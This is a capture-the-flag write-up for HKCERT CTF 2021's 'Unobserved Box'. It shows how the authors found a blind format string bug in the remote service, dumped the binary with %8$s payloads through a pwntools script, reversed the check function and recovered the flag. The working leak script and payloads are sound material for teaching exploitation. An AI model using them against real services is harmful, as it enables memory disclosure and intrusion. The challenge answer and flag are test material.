Unobserved Box (250 pts, 6 solves)
Team Name: O0027 - UND3r 20 D53 H473r5 4ND r374K3r
Solved by: grhkm and Kaiziron
Source of the problem: HKCERT CTF 2021
Problem Statement
All codes are uncertain before the measurement, and you will never make it.
Observe the code to get the flag.
nc chalp.hkcert21.pwnable.hk 28132
Solution Outline
We dump the binary from 0x400000 to 0x405000 using format string and %8$s
, then reverse engineer the check
function for the flag.
Initial Discoveries
Let’s have a look at the server:
❯ nc chalp.hkcert21.pwnable.hk 28132
AAAAAAAA
AAAAAAAA is not the correct answer.
❯ python3 -c "print('A' \* 200)" | nc chalp.hkcert21.pwnable.hk 28132
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA is not the correct answer.
❯ python3 -c "print('A' \* 2000)" | nc chalp.hkcert21.pwnable.hk 28132
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA is not the correct answer.
❯ python3 -c "print('%p|' * 25)" | nc chalp.hkcert21.pwnable.hk 28132
0x7fffe0708a40|0x7fffe0708a40|(nil)|0x7fcf5ced7d80|0x7fcf5ced7d80|0x70257c70257c7025|0x257c70257c70257c|0x7c70257c70257c70|0x257c70257c7025|0x401490| is not the correct answer.
Woah, we just found a format string vulnerability!
Dumping Binary
With the format string vulnerability, let’s tweak it to point to our input:
❯ python3 -c "print('%p' + '|' + 'A' * 20)" | nc chalp.hkcert21.pwnable.hk 28132
0x7ffc5c5ede60|AAAAAAAAAAAAAAAAAAAA is not the correct answer.
❯ python3 -c "print('%1\$p' + '|' + 'A' * 20)" | nc chalp.hkcert21.pwnable.hk 28132
0x7fffebbd6ef0|AAAAAAAAAAAAAAAAAAAA is not the correct answer.
...
❯ python3 -c "print('%8\$p' + '|' + 'A' * 20)" | nc chalp.hkcert21.pwnable.hk 28132
0x4141414141414141|AAAAAAAAAAAAAAAAAAAA is not the correct answer.
So now that our format string %8$p
points to the input, how about we write an address to it? More importantly, we know that 64-bit code segments usually start at 0x400000, so we can explore that:
❯ python3 -c "print('%8\$p' + '|' + 'ABCDEFGHIJKLMNOPQRST')" | nc chalp.hkcert21.pwnable.hk 28132
0x535251504f4e4d4c|ABCDEFGHIJKLMNOPQRST is not the correct answer.
# 0x53 -> S, 0x4c -> L
❯ python3 -c "print('%8\$p' + '|' + 'ABCDEFGHIJK________')" | nc chalp.hkcert21.pwnable.hk 28132
0x5f5f5f5f5f5f5f5f|ABCDEFGHIJK________ is not the correct answer.
❯ python3 -c "print('%8\$p' + '|' + 'ABCDEFGHIJK\x00\x00\x40\x00\x00\x00\x00\x00')" | nc chalp.hkcert21.pwnable.hk 28132
0x400000|ABCDEFGHIJK is not the correct answer.
Great, now note that the $s
format provides functionality to output the string at the location. So for example in the last command above, if we replace %8$p
with %8$s
, we would get:
# the magic header has appeared
❯ python3 -c "print('%8\$s' + '|' + 'ABCDEFGHIJK\x00\x00\x40\x00\x00\x00\x00\x00')" | nc chalp.hkcert21.pwnable.hk 28132
ELF|ABCDEFGHIJK is not the correct answer.
❯ python3 -c "print('%8\$s' + '|' + 'ABCDEFGHIJK\x00\x00\x40\x00\x00\x00\x00\x00')" | nc chalp.hkcert21.pwnable.hk 28132 | hexdump -C
00000000 7f 45 4c 46 02 01 01 7c 41 42 43 44 45 46 47 48 |.ELF...|ABCDEFGH|
00000010 49 4a 4b 20 69 73 20 6e 6f 74 20 74 68 65 20 63 |IJK is not the c|
00000020 6f 72 72 65 63 74 20 61 6e 73 77 65 72 2e 0a |orrect answer..|
0000002f
# remember - 64-bit systems!
❯ python3 -c "print('%8\$s' + '|' + 'ABCDEFGHIJK\x00\x00\x40\x00\x00\x00\x00\x00')" | nc chalp.hkcert21.pwnable.hk 28132 | python3 -c "print(input().split('|')[0], end='')" | hexdump -C
00000000 7f 45 4c 46 02 01 01 |.ELF...|
00000007
Hurray! Since strings are terminated by null-bytes, we also know that the byte after the output is a null byte, and we can continue at that address and repeat.
(Note: if there is no output, which is the case for address 0x400008)
There are a few other issues to address. An important one is when the address contains \x0a
, more commonly known as \n
, the print statement will output a newline and the server skips the part afterwards. I simply skip over them, which shouldn’t cause too much of a problem - just a single byte replaced with a null byte.
Now let’s put this all into one python script:
from pwn import *
context.log_level = 'WARNING'
conn = None
host, port = 'chalp.hkcert21.pwnable.hk', 28132
def init():
global conn
if conn is not None:
conn.close()
conn = remote(host, port)
def dump(addr):
# Turn 0x400102 into b'\x02\x01\x40\x00\x00\x00\x00\x00'
bddr = bytes.fromhex(hex(addr)[2:].zfill(16))[::-1]
# Handling special case: '\n'
if b'\n' in bddr:
return b''
# Then construct payload: [fs]|[pad][bddr]
fs = b'%8$s'
pad = b'ABCDEFGHIJK'
payload = fs + b'|' + pad + bddr
# send it!
init()
conn.send(payload + b'\n')
response = conn.recvuntil(b'|')[:-1]
print(f'[*] {hex(addr)} => {response}')
return response
addr = 0x400000
while True:
# append, bytes
with open('dump', 'ab') as fout:
# ends at null byte
res = dump(addr) + b'\0'
addr += len(res)
fout.write(res)
fout.flush()
The next step is to let the code run zzz…
You can download the binary I got.
Reverse Engineering
Once we have sufficient amount of the binary, we can open it in IDA or other tools. Looking around, we find what seems to be the check function:
Each block is relatively simple, and we can go through them one by one. Just a trick in general - not everything has to be carefully checked and rigorous. Looking through the code and cracking it took us one minute - guess and hand-waving work is key!
push rbp
mov rbp, rsp
sub rsp, 10h
mov [rbp+var_8], rdi
mov rax, [rbp+var_8] # [rdp+var_8] is our input string (s)
mov rdi, rax
call sub_401060 # some libc function with a string parameter - len!
cmp rax, 13h # [1] len(s) == 19 (0x13)
jz short loc_4011BA
mov rax, [rbp+var_8]
add rax, 6 # s[6]
movzx eax, byte ptr [rax]
cmp al, 5Fh # [2] s[6] == '_' (0x5f)
jnz short loc_4011E3
mov rax, [rbp+var_8]
add rax, 9
movzx edx, byte ptr [rax] # edx = s[9]
mov rax, [rbp+var_8]
add rax, 6
movzx eax, byte ptr [rax] # eax = s[6]
cmp dl, al # [3] s[6] == s[9]
jz short loc_4011ED
mov rax, [rbp+var_8]
mov edx, 6
lea rsi, aPrintf_0 ; "printf" # aww IDA is so nice
mov rdi, rax
call sub_401040 # some libc function with two string parameters (one is constant)
test eax, eax # probably strcmp
jz short loc_401213 # [4] s[:6] == "printf"
mov rax, [rbp+var_8]
add rax, 0Ah # start at s[10]
mov edx, 6
lea rsi, aDanger ; "danger"
mov rdi, rax
call sub_401040
test eax, eax # [5] s[10:16] == "danger"
jz short loc_40123D
mov rax, [rbp+var_8]
add rax, 12h
movzx eax, byte ptr [rax]
cmp al, 73h # [6] s[18] == 's'
jz short loc_401253
mov rax, [rbp+var_8]
add rax, 11h
movzx eax, byte ptr [rax]
cmp al, 75h # [7] s[17] == 'u'
jz short loc_401269
mov rax, [rbp+var_8]
add rax, 10h
movzx eax, byte ptr [rax]
cmp al, 6Fh # [8] s[16] == 'o'
jz short loc_40127F
mov rax, [rbp+var_8]
add rax, 2
movzx edx, byte ptr [rax]
mov rax, [rbp+var_8]
add rax, 7
movzx eax, byte ptr [rax]
cmp dl, al # [9] s[2] == s[7]
jz short loc_4012A0
mov rax, [rbp+var_8]
add rax, 8
movzx edx, byte ptr [rax]
mov rax, [rbp+var_8]
add rax, 12h
movzx eax, byte ptr [rax]
cmp dl, al # [10] s[8] == s[18]
jz short loc_4012C1
Putting them together, we have:
len(s) == 19
s[6] == '_'
s[6] == s[9]
s[:6] == "printf"
s[10:16] == "danger"
s[18] == 's'
s[17] == 'u'
s[16] == 'o'
s[2] == s[7]
s[8] == s[18]
No, don’t start writing a z3 solver script yet. Get your pen and paper and try it out!
Finally, we get that s == printf_is_dangerous
. Supplying it to the remote server gives
❯ echo printf_is_dangerous | nc chalp.hkcert21.pwnable.hk 28132
hkcert21{l3akinG_the_world_giVE_U_7H3_FLAG}
Flag: hkcert21{l3akinG_the_world_giVE_U_7H3_FLAG}
Remarks
If this is your first time seeing blind format string, here are some good writeups from previous challenges:
- 33C3CTF ESPR by LiveOverflow
- HITB-XCTF GSEC 2018 by David Buchanan